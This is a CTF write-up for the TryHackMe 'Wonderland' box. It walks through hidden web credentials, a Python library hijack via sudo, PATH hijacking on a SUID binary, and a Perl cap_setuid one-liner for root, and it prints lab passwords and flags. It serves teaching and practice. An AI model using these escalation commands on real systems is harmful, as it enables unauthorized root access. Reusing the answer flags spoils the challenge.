Wonderland — TryHackMe CTF

Alice-in-Wonderland themed box with reversed flag locations. Python library hijacking via sudo, PATH hijacking on SUID binary, and Perl cap_setuid capability for root. 2 flags.

TryHackMe | Medium | Mar 2026 | 0xb0rn3 | oxbv1

Overview

Everything is reversed: user.txt is in /root and root.txt is in /home/alice. The attack chain starts with hidden web credentials, followed by three distinct privilege escalation stages: Python library hijacking, PATH hijacking on a SUID binary, and Linux capabilities on Perl.

/r/a/b/b/i/t → Hidden creds (alice) → SSH → Python import hijack (sudo as rabbit) → PATH hijack on teaParty SUID (rabbit → hatter) → Perl cap_setuid (hatter → root)

Foothold

Web server hint: "Follow the white rabbit." Navigating to /r/a/b/b/i/t reveals hidden credentials in page source:

<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>

SSH as alice. user.txt is in /root (readable by alice — intentional reversal).

USER: thm{"Curiouser and curiouser!"}

Alice → Rabbit (Python Import Hijack)

sudo -l  # (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

The script does `import random`. Python resolves imports from the script's own directory (/home/alice) before the standard library, so a file named /home/alice/random.py shadows the real module; run the script via sudo and the code in it executes as rabbit.
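As an added illustration of the import hijack (not code from the original writeup), the Python below shows which `random` module the interpreter resolves with and without the script's directory on the search path, and audits the sudo-rule pattern behind it: a script whose file or directory the invoking user can write. The temporary directory, the decoy random.py and the walrus.py name are constructed for the demo.

```python
"""Added example: why 'sudo python3 /home/alice/script.py' is hijackable when
alice owns /home/alice, and how to audit a sudo rule for that pattern."""
import importlib.machinery
import os
import stat
import sys
import tempfile


def resolve_module(name, search_path):
    """Return the file Python would load for `name` given a sys.path-like list."""
    spec = importlib.machinery.PathFinder.find_spec(name, search_path)
    return spec.origin if spec else None


def writable_by(path, uid, gid):
    """True if user (uid, gid) can write `path` via owner, group or other bits.
    Ignores ACLs and supplementary groups; sufficient for the sudo-rule audit."""
    st = os.stat(path)
    return bool((st.st_uid == uid and st.st_mode & stat.S_IWUSR)
                or (st.st_gid == gid and st.st_mode & stat.S_IWGRP)
                or st.st_mode & stat.S_IWOTH)


def audit_sudo_script(script_path, uid, gid):
    """Paths the invoking user can modify: the script itself, or its directory,
    which becomes sys.path[0] at run time and so shadows every stdlib import."""
    return [p for p in (script_path, os.path.dirname(script_path))
            if writable_by(p, uid, gid)]


def shadowing_demo():
    """Constructed scenario: a script directory owned by the current user that
    holds a decoy random.py next to the script a sudo rule would run."""
    with tempfile.TemporaryDirectory() as script_dir:
        script = os.path.join(script_dir, "walrus.py")   # hypothetical sudo target
        decoy = os.path.join(script_dir, "random.py")    # shadows the stdlib module
        for p in (script, decoy):
            with open(p, "w") as f:
                f.write("# constructed file for the demo\n")
        stdlib_only = [p for p in sys.path if p and p != script_dir]
        return {
            "decoy": decoy,
            "with_script_dir": resolve_module("random", [script_dir] + stdlib_only),
            "without_script_dir": resolve_module("random", stdlib_only),
            "writable": audit_sudo_script(script, os.getuid(), os.getgid()),
        }


if __name__ == "__main__":
    for key, value in shadowing_demo().items():
        print(f"{key}: {value}")
```

With the script directory on the path the decoy wins; without it the standard-library random is resolved, and the audit reports both the script and its directory as writable by the invoking user, which is exactly the condition the sudo rule on this box creates.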

Rabbit → Hatter (PATH Hijack)

/home/rabbit/teaParty is SUID. ltrace shows it calls system("... date") with date as a relative path. Create /tmp/date (malicious), prepend /tmp to PATH. The binary drops to hatter (uid 1003) before calling system().

# /tmp/date reads hatter's password
cat /home/hatter/password.txt > /tmp/hatter_pass.txt
# password: WhyIsARavenLikeAWritingDesk?

Hatter → Root (Perl cap_setuid)

getcap -r / 2>/dev/null
# /usr/bin/perl = cap_setuid+ep

Perl with cap_setuid can set UID to 0:

perl -e 'use POSIX qw(setuid); POSIX::setuid(0);
  exec "/bin/bash -c \"cat /home/alice/root.txt\""'

ROOT: thm{Twinkle, twinkle, little bat! How I wonder what you're at!}

Lessons Learned

  1. Python import hijacking: the directory of the script being run is sys.path[0]. Any import in a sudo-run script whose directory the invoking user can write to can be hijacked.
  2. PATH hijacking: SUID binaries calling system() with relative commands are vulnerable when we control PATH.
  3. Linux capabilities: cap_setuid+ep on interpreters (Perl/Python/Ruby) = trivial root. Always check getcap -r /.
  4. Hidden HTML content: display:none elements often contain secrets.